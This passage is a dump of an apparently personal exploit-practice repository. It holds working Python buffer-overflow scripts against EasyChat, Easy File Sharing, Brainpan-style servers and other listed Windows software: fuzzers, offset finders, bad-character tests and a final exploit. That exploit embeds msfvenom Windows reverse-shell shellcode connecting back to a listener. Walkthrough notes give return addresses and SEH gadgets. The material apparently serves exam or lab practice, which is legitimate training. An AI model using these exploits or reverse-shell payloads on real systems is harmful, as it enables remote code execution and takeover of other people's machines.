├── BufferOverflow ├── Brainpain │ ├── APp brianpain walk │ ├── Offset.py │ ├── Pattern.py │ ├── bad_chat.py │ ├── fuzz.py │ ├── shell_code │ └── shellcode.py ├── EasyChat │ ├── Bad_char.py │ ├── Fuzz.py │ ├── Offset.py │ ├── Pattern.py │ ├── Shellcode.py │ └── Walkthough ├── Easy_FIle_Share │ ├── Bad_char.py │ ├── Easy_fileSHare walkthought │ ├── Fuzz.py │ ├── Offset.py │ ├── Pattern.py │ └── Shellcode.py ├── Echo_memcpy │ ├── Bad_char.py │ ├── Eip_control.py │ ├── fuzz.py │ └── offset.py ├── Echo_server │ ├── Eip_control.py │ ├── bad_char.py │ ├── fuzz.py │ ├── offset.py │ ├── shellcode.py │ └── untitled ├── Echo_server_V2 │ ├── Eip_control.py │ ├── bad_char.py │ ├── extra_op.py │ ├── extra_op2.py │ ├── fuzz.py │ ├── offset.py │ ├── shellcode.py │ └── walkthi ├── FLoatFTP │ ├── @old │ │ ├── badc1.py │ │ ├── badc2.py │ │ ├── badchar.py │ │ ├── exploit.py │ │ ├── newoffset.py │ │ ├── pattern.py │ │ └── ty.py │ ├── Eip_control.py │ ├── ShellCode.py │ ├── bad_char.py │ ├── exploit_code │ ├── fuzz.py │ ├── offset.py │ ├── ret_add │ ├── return_add.py │ └── writewup ├── Freesshd │ ├── Bad_char.py │ ├── Eip_control.py │ ├── Pattern.py │ ├── fuzz.py │ ├── offset.py │ ├── shell.txt │ ├── shellcode.py │ └── wakjhtough ├── MicroP │ ├── Bad_char.py │ ├── Bad_char2.py │ ├── Bad_char3.py │ ├── Eip_control.mppl │ ├── bad_char.mppl │ ├── bad_char2.mppl │ ├── bad_char3.mppl │ ├── crash.mppl │ ├── eip_control-py.txt │ ├── eip_control.py │ ├── offset.py │ ├── pattern.mppl │ ├── pattern.py │ ├── raw_shellcode │ ├── shellcode.mppl │ ├── shellcode.py │ ├── shellcode2.mppl │ ├── shellcode2.py │ └── walkthough_microp ├── SLMail │ ├── Bad_char.py │ ├── EIP_control.py │ ├── Fuzz.py │ ├── Ofset.py │ ├── Pattern.py │ ├── SLmail Walkthough │ └── Shellcode.py ├── Savent WebServer │ ├── Eip_over.py │ ├── Pattern.py │ ├── Walkthought- SaventServer │ ├── fuzz.py │ └── ty.py ├── Script │ ├── BOF sc.zip │ ├── BOF sc │ │ ├── Eip_control.py │ │ ├── Eip_controlsd.py │ │ ├── ShellCode.py │ │ ├── bad_char │ │ ├── bad_char.py │ │ ├── bad_chat.py │ │ ├── bc_len.py │ │ ├── fuzz.py │ │ ├── offset.py │ │ └── return_add.py │ ├── Eip_control.py │ ├── Eip_controlsd.py │ ├── ShellCode.py │ ├── bad_char │ ├── bad_char.py │ ├── fuzz.py │ ├── offset.py │ └── return_add.py ├── SimpleWebserver │ ├── Eip_control.py │ ├── Pattern.py │ ├── Shellcode.py │ ├── Walk │ ├── badchar.py │ └── fuzzer.py ├── SyncBreeze-Server │ ├── Bad_cahr.py │ ├── EIP_control.py │ ├── Fuzz.py │ ├── Offset.py │ ├── Pattern.py │ ├── Shellcode.py │ └── Walk though ├── Vuln Part2 │ ├── Eip_control.py │ ├── ShellCode.py │ ├── bad_char │ ├── bad_char.py │ ├── exploit_code │ ├── fuzz.py │ ├── index │ ├── offset.py │ ├── ret_add │ ├── return_add.py │ └── spike.spk ├── VulnServer │ ├── Eip_control.py │ ├── ShellCode.py │ ├── Vuln Part2 │ │ ├── Eip_control.py │ │ ├── ShellCode.py │ │ ├── bad_char │ │ ├── bad_char.py │ │ ├── exploit_code │ │ ├── fuzz.py │ │ ├── index │ │ ├── offset.py │ │ ├── ret_add │ │ ├── return_add.py │ │ └── spike.spk │ ├── Writeup Vuln Server │ ├── bad_char │ ├── bad_char.py │ ├── exploit_code │ ├── fuzz.py │ ├── offset.py │ ├── ret_add │ ├── return_add.py │ └── spike.spk ├── WarFTp │ ├── BadChar.py │ ├── Fuzz.py │ ├── Offset.py │ ├── Pattern.py │ └── Walkthough wartpo ├── crossfire │ ├── ShellCode.py │ ├── bad_char.py │ ├── eip.py │ ├── fuzz.py │ ├── offset.py │ └── walk ├── dostackbufferoverflowgood │ ├── Bad_char.py │ ├── EIP.py │ ├── Fuzz.py │ ├── Pattern.py │ ├── Shellcode.py │ ├── WalkTHorugh │ ├── shellcode │ └── ty.py └── fileserver │ ├── bad_char.py │ ├── fuzz.py │ ├── offset_verify.py │ ├── pattern.py │ ├── shellcode.py │ └── walkthoufh ├── CTF_template.ctb └── Checklist ├── File_trr ├── Linx_priv ├── List payloads ├── Oneliner_erverse_shell ├── Port_forwarding ├── TTY ├── WinPriEsc_Checklist ├── buffer overflow checklist └── inital_Foot_hold /BufferOverflow/Brainpain/APp brianpain walk: -------------------------------------------------------------------------------- 1 | App brianpain 2 | IP 192.168.0.134 3 | port 9999 4 | 5 | 6 | 7 | 1. fuzzing remoter server "A" *700 8 | 9 | 2. Send pattern adn find EIP 35724134 10 | 11 | 3. finding offsert 524 12 | 13 | 4. Finding bad-char "\x00" 14 | 15 | 5. generating shellcode (msfvenom -p Windows/shell_reverse_tcp LHOS=1192.168.0.135 LPORT=1234 EXITFUNC=thread -f c -b "\x00\") 16 | 17 | 6. find JMP ESP "\xff\xe4" "\xf3\x12\x17\x31" 18 | 19 | 7. Sending final exploit -------------------------------------------------------------------------------- /BufferOverflow/Brainpain/Offset.py: -------------------------------------------------------------------------------- 1 | import sys, socket 2 | 3 | \ 4 | 5 | buffer ="A" * 524 + "B" *4 + badchar 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.0.134',9999)) 10 | print "Sending Exploit to remote system......." 11 | s.send((buffer)) 12 | s.recv(1024) 13 | s.close() 14 | 15 | 16 | 17 | except: 18 | print("Unable to connect to remote server ......") 19 | -------------------------------------------------------------------------------- /BufferOverflow/Brainpain/Pattern.py: -------------------------------------------------------------------------------- 1 | import sys, socket 2 | 3 | 4 | buffer ="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2A" 5 | 6 | try: 7 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 8 | s.connect(('192.168.0.134',9999)) 9 | print "Sending Exploit to remote system......." 10 | s.send((buffer)) 11 | s.recv(1024) 12 | s.close() 13 | 14 | 15 | 16 | except: 17 | print("Unable to connect to remote server ......") 18 | -------------------------------------------------------------------------------- /BufferOverflow/Brainpain/bad_chat.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | 5 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 6 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 7 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 8 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 9 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 10 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 11 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 12 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 13 | 14 | 15 | 16 | buffer ="A" * 524 + "B" *4 + badchars 17 | 18 | try: 19 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 20 | s.connect(('192.168.0.134',9999)) 21 | print "Sending Exploit to remote system......." 22 | s.send((buffer)) 23 | s.recv(1024) 24 | s.close() 25 | 26 | 27 | 28 | except: 29 | print("Unable to connect to remote server ......") 30 | -------------------------------------------------------------------------------- /BufferOverflow/Brainpain/fuzz.py: -------------------------------------------------------------------------------- 1 | import sys, socket 2 | from time import sleep 3 | 4 | buffer ="A" * 100 5 | eob = "HTTP/1.1\r\n\r\n" 6 | while True: 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.0.134',9999)) 10 | print "Trying with buffer length %d" % len(buffer) 11 | s.send((buffer)) 12 | s.recv(1024) 13 | s.close() 14 | 15 | buffer=buffer + "A"*100 16 | 17 | 18 | except: 19 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 20 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/Brainpain/shell_code: -------------------------------------------------------------------------------- 1 | msfvenom -p windows/shell_reverse_tcp LHOS=1192.168.0.135 LPORT=1234 EXITFUNC=thread -f c -b "\x00" 2 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload 3 | [-] No arch selected, selecting arch: x86 from the payload 4 | Found 11 compatible encoders 5 | Attempting to encode payload with 1 iterations of x86/shikata_ga_nai 6 | x86/shikata_ga_nai succeeded with size 351 (iteration=0) 7 | x86/shikata_ga_nai chosen with final size 351 8 | Payload size: 351 bytes 9 | Final size of c file: 1500 bytes 10 | unsigned char buf[] = 11 | "\xba\xd2\xd8\xc8\x29\xdb\xc3\xd9\x74\x24\xf4\x5b\x33\xc9\xb1" 12 | "\x52\x83\xc3\x04\x31\x53\x0e\x03\x81\xd6\x2a\xdc\xd9\x0f\x28" 13 | "\x1f\x21\xd0\x4d\xa9\xc4\xe1\x4d\xcd\x8d\x52\x7e\x85\xc3\x5e" 14 | "\xf5\xcb\xf7\xd5\x7b\xc4\xf8\x5e\x31\x32\x37\x5e\x6a\x06\x56" 15 | "\xdc\x71\x5b\xb8\xdd\xb9\xae\xb9\x1a\xa7\x43\xeb\xf3\xa3\xf6" 16 | "\x1b\x77\xf9\xca\x90\xcb\xef\x4a\x45\x9b\x0e\x7a\xd8\x97\x48" 17 | "\x5c\xdb\x74\xe1\xd5\xc3\x99\xcc\xac\x78\x69\xba\x2e\xa8\xa3" 18 | "\x43\x9c\x95\x0b\xb6\xdc\xd2\xac\x29\xab\x2a\xcf\xd4\xac\xe9" 19 | "\xad\x02\x38\xe9\x16\xc0\x9a\xd5\xa7\x05\x7c\x9e\xa4\xe2\x0a" 20 | "\xf8\xa8\xf5\xdf\x73\xd4\x7e\xde\x53\x5c\xc4\xc5\x77\x04\x9e" 21 | "\x64\x2e\xe0\x71\x98\x30\x4b\x2d\x3c\x3b\x66\x3a\x4d\x66\xef" 22 | "\x8f\x7c\x98\xef\x87\xf7\xeb\xdd\x08\xac\x63\x6e\xc0\x6a\x74" 23 | "\x91\xfb\xcb\xea\x6c\x04\x2c\x23\xab\x50\x7c\x5b\x1a\xd9\x17" 24 | "\x9b\xa3\x0c\xb7\xcb\x0b\xff\x78\xbb\xeb\xaf\x10\xd1\xe3\x90" 25 | "\x01\xda\x29\xb9\xa8\x21\xba\x06\x84\x29\xbd\xef\xd7\x29\xc5" 26 | "\x3d\x5e\xcf\xaf\xd1\x37\x58\x58\x4b\x12\x12\xf9\x94\x88\x5f" 27 | "\x39\x1e\x3f\xa0\xf4\xd7\x4a\xb2\x61\x18\x01\xe8\x24\x27\xbf" 28 | "\x84\xab\xba\x24\x54\xa5\xa6\xf2\x03\xe2\x19\x0b\xc1\x1e\x03" 29 | "\xa5\xf7\xe2\xd5\x8e\xb3\x38\x26\x10\x3a\xcc\x12\x36\x2c\x08" 30 | "\x9a\x72\x18\xc4\xcd\x2c\xf6\xa2\xa7\x9e\xa0\x7c\x1b\x49\x24" 31 | "\xf8\x57\x4a\x32\x05\xb2\x3c\xda\xb4\x6b\x79\xe5\x79\xfc\x8d" 32 | "\x9e\x67\x9c\x72\x75\x2c\xbc\x90\x5f\x59\x55\x0d\x0a\xe0\x38" 33 | "\xae\xe1\x27\x45\x2d\x03\xd8\xb2\x2d\x66\xdd\xff\xe9\x9b\xaf" 34 | "\x90\x9f\x9b\x1c\x90\xb5"; -------------------------------------------------------------------------------- /BufferOverflow/Brainpain/shellcode.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | 5 | shellcode = ("\xba\xd2\xd8\xc8\x29\xdb\xc3\xd9\x74\x24\xf4\x5b\x33\xc9\xb1" 6 | "\x52\x83\xc3\x04\x31\x53\x0e\x03\x81\xd6\x2a\xdc\xd9\x0f\x28" 7 | "\x1f\x21\xd0\x4d\xa9\xc4\xe1\x4d\xcd\x8d\x52\x7e\x85\xc3\x5e" 8 | "\xf5\xcb\xf7\xd5\x7b\xc4\xf8\x5e\x31\x32\x37\x5e\x6a\x06\x56" 9 | "\xdc\x71\x5b\xb8\xdd\xb9\xae\xb9\x1a\xa7\x43\xeb\xf3\xa3\xf6" 10 | "\x1b\x77\xf9\xca\x90\xcb\xef\x4a\x45\x9b\x0e\x7a\xd8\x97\x48" 11 | "\x5c\xdb\x74\xe1\xd5\xc3\x99\xcc\xac\x78\x69\xba\x2e\xa8\xa3" 12 | "\x43\x9c\x95\x0b\xb6\xdc\xd2\xac\x29\xab\x2a\xcf\xd4\xac\xe9" 13 | "\xad\x02\x38\xe9\x16\xc0\x9a\xd5\xa7\x05\x7c\x9e\xa4\xe2\x0a" 14 | "\xf8\xa8\xf5\xdf\x73\xd4\x7e\xde\x53\x5c\xc4\xc5\x77\x04\x9e" 15 | "\x64\x2e\xe0\x71\x98\x30\x4b\x2d\x3c\x3b\x66\x3a\x4d\x66\xef" 16 | "\x8f\x7c\x98\xef\x87\xf7\xeb\xdd\x08\xac\x63\x6e\xc0\x6a\x74" 17 | "\x91\xfb\xcb\xea\x6c\x04\x2c\x23\xab\x50\x7c\x5b\x1a\xd9\x17" 18 | "\x9b\xa3\x0c\xb7\xcb\x0b\xff\x78\xbb\xeb\xaf\x10\xd1\xe3\x90" 19 | "\x01\xda\x29\xb9\xa8\x21\xba\x06\x84\x29\xbd\xef\xd7\x29\xc5" 20 | "\x3d\x5e\xcf\xaf\xd1\x37\x58\x58\x4b\x12\x12\xf9\x94\x88\x5f" 21 | "\x39\x1e\x3f\xa0\xf4\xd7\x4a\xb2\x61\x18\x01\xe8\x24\x27\xbf" 22 | "\x84\xab\xba\x24\x54\xa5\xa6\xf2\x03\xe2\x19\x0b\xc1\x1e\x03" 23 | "\xa5\xf7\xe2\xd5\x8e\xb3\x38\x26\x10\x3a\xcc\x12\x36\x2c\x08" 24 | "\x9a\x72\x18\xc4\xcd\x2c\xf6\xa2\xa7\x9e\xa0\x7c\x1b\x49\x24" 25 | "\xf8\x57\x4a\x32\x05\xb2\x3c\xda\xb4\x6b\x79\xe5\x79\xfc\x8d" 26 | "\x9e\x67\x9c\x72\x75\x2c\xbc\x90\x5f\x59\x55\x0d\x0a\xe0\x38" 27 | "\xae\xe1\x27\x45\x2d\x03\xd8\xb2\x2d\x66\xdd\xff\xe9\x9b\xaf" 28 | "\x90\x9f\x9b\x1c\x90\xb5") 29 | #311712F3 30 | 31 | 32 | 33 | buffer ="A" * 524 + "\xf3\x12\x17\x31" + "\x90" * 20 + shellcode 34 | 35 | 36 | try: 37 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 38 | s.connect(('192.168.0.134',9999)) 39 | print "Sending Exploit to remote system......." 40 | s.send((buffer)) 41 | s.recv(1024) 42 | s.close() 43 | 44 | 45 | 46 | except: 47 | print("Unable to connect to remote server ......") 48 | -------------------------------------------------------------------------------- /BufferOverflow/EasyChat/Bad_char.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | 6 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 7 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 8 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 9 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 10 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 11 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 12 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 13 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 14 | 15 | 16 | fuzz = "A" * 216 + '\xEB\x06\x90\x90' + '\x7f\x22\x00\x10' + '\x90' *16 + badchars 17 | 18 | buffer = 'GET /chat.ghp?username=' + fuzz + '&password=test&room=1&sex=1 HTTP/1.1\r\n\r\n' 19 | buffer += 'Host: 192.168.0.134\r\n\r\n' 20 | 21 | 22 | try: 23 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 24 | s.connect(('192.168.0.134',80)) 25 | print ('Sending Payload........') 26 | s.send(buffer) 27 | s.close() 28 | 29 | 30 | 31 | except: 32 | print ('Unable to Connect !........') 33 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/EasyChat/Fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | from time import sleep 6 | 7 | 8 | 9 | fuzz = 'A' * 100 10 | 11 | buffer = 'GET /chat.ghp?username=' + fuzz + '&password=test&room=1&sex=1 HTTP/1.1\r\n\r\n' 12 | buffer += 'Host: 192.168.0.134\r\n\r\n' 13 | 14 | while True: 15 | try: 16 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 17 | s.connect(('192.168.0.134',80)) 18 | print '[*] Fuzzing username with buffer length: ' + str(len(fuzz)) 19 | s.send(buffer) 20 | s.close() 21 | sleep (1) 22 | buffer = 'GET /chat.ghp?username=' + fuzz + '&password=test&room=1&sex=2 HTTP/1.1\r\n' 23 | buffer += 'Host: 192.168.0.134\r\n\r\n' 24 | fuzz += 'A' * 100 25 | 26 | except: 27 | print '[*] Crash occurred at buffer length: ' + str(len(fuzz)-50) 28 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/EasyChat/Offset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | 6 | 7 | 8 | 9 | fuzz = "A" * 221 + "B" * 4 + "C" * 100 10 | 11 | buffer = 'GET /chat.ghp?username=' + fuzz + '&password=test&room=1&sex=1 HTTP/1.1\r\n\r\n' 12 | buffer += 'Host: 192.168.0.134\r\n\r\n' 13 | 14 | 15 | try: 16 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 17 | s.connect(('192.168.0.134',80)) 18 | print ('Sending Payload........') 19 | s.send(buffer) 20 | s.close() 21 | 22 | 23 | 24 | except: 25 | print ('Unable to Connect !........') 26 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/EasyChat/Pattern.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | 6 | 7 | 8 | 9 | fuzz = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq" 10 | 11 | buffer = 'GET /chat.ghp?username=' + fuzz + '&password=test&room=1&sex=1 HTTP/1.1\r\n\r\n' 12 | buffer += 'Host: 192.168.0.134\r\n\r\n' 13 | 14 | 15 | try: 16 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 17 | s.connect(('192.168.0.134',80)) 18 | print ('Sending Payload........') 19 | s.send(buffer) 20 | s.close() 21 | 22 | 23 | 24 | except: 25 | print ('Unable to Connect !........') 26 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/EasyChat/Shellcode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import struct 5 | 6 | target_ip = '192.168.0.134' 7 | target_port = 80 8 | jmp_esp= struct.pack("34684133 11 | 12 | 3. Calculating Offset 221 13 | 14 | 4. Checking OFfset 15 | 16 | 5. Finding POP POP RETN => POP r32 POP r32 RETN 17 | { 18 | 1000227F 5D POP EBP (\x7f\x22\x00\x10) 19 | 10002280 5B POP EBX 20 | 10002281 C3 RETN 21 | } 22 | 23 | 6. Finding Bad Char \x00\x20\x0a\x0d -------------------------------------------------------------------------------- /BufferOverflow/Easy_FIle_Share/Bad_char.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import os 4 | import sys 5 | 6 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 7 | "\x21\x22\x23\x24\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 8 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5d\x5e\x5f" 9 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 10 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 11 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 12 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 13 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 14 | 15 | 16 | 17 | buff = "A" * 4500 18 | buff+= badchars 19 | buff+= "D" * (5000 -len(buff)) 20 | 21 | 22 | try: 23 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 24 | s.connect(('192.168.0.134',80)) 25 | print "Sending paylaod..........." 26 | s.send(("GET " + buff + " HTTP/1.1\r\n")) 27 | s.recv(1024) 28 | s.close() 29 | 30 | except: 31 | print("Unable to connect.......") 32 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/Easy_FIle_Share/Easy_fileSHare walkthought: -------------------------------------------------------------------------------- 1 | APP Easy File Sharing 2 | 3 | IP : 192.168.0.134 4 | 5 | Port :80 6 | PORT STATE SERVICE VERSION 7 | 80/tcp open http Easy File Sharing Web Server httpd 6.9 8 | __________________________________________________________ 9 | 10 | 1. Crashing remote app at 4500 11 | 12 | 2. Send pattern and find EIp => 46356646 13 | 14 | 3. Finding offset 4065 15 | 16 | 4. Find badchar "\x00\x20" 17 | 18 | 5. IFnding POP POP RET => !mona seh 19 | 20 | 6. SEH protection so finf 21 | { 22 | 23 | !mona seh 24 | find seqxuwnce of instruction POP r32 POP r32 RETN 25 | Executable modules, item 3 26 | Base=10000000 27 | Size=00050000 (327680.) 28 | Entry=1001AB40 ImageLoa. 29 | Name=ImageLoa 30 | Path=C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll 31 | 32 | } 33 | 34 | 35 | 7. Shelloce 36 | 37 | -------------------------------------------------------------------------------- /BufferOverflow/Easy_FIle_Share/Fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import os 4 | import sys 5 | 6 | buff = "A" * 100 7 | 8 | while True: 9 | try: 10 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 11 | s.connect(('192.168.0.134',80)) 12 | print "Trying with buffer length %d" % len(buff) 13 | s.send(("GET " + buff + " HTTP/1.0\r\n\r\n")) 14 | s.recv(1024) 15 | s.close() 16 | 17 | buff=buff + "A"*100 18 | 19 | 20 | except: 21 | print("Fuzzing Crashed at %s by" % str(len(buff))) 22 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/Easy_FIle_Share/Offset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import os 4 | import sys 5 | 6 | buff = "A" * 4059 + "B" * 4 + "C" * 4 7 | buff+="A" * (4183 - len(buff)) 8 | buff+= "D" * 4 9 | buff+="A" * (5000-len(buff)) 10 | 11 | 12 | try: 13 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 14 | s.connect(('192.168.0.134',80)) 15 | print "Sending paylaod..........." 16 | s.send(("GET " + buff + " HTTP/1.0\r\n\r\n")) 17 | s.recv(1024) 18 | s.close() 19 | 20 | except: 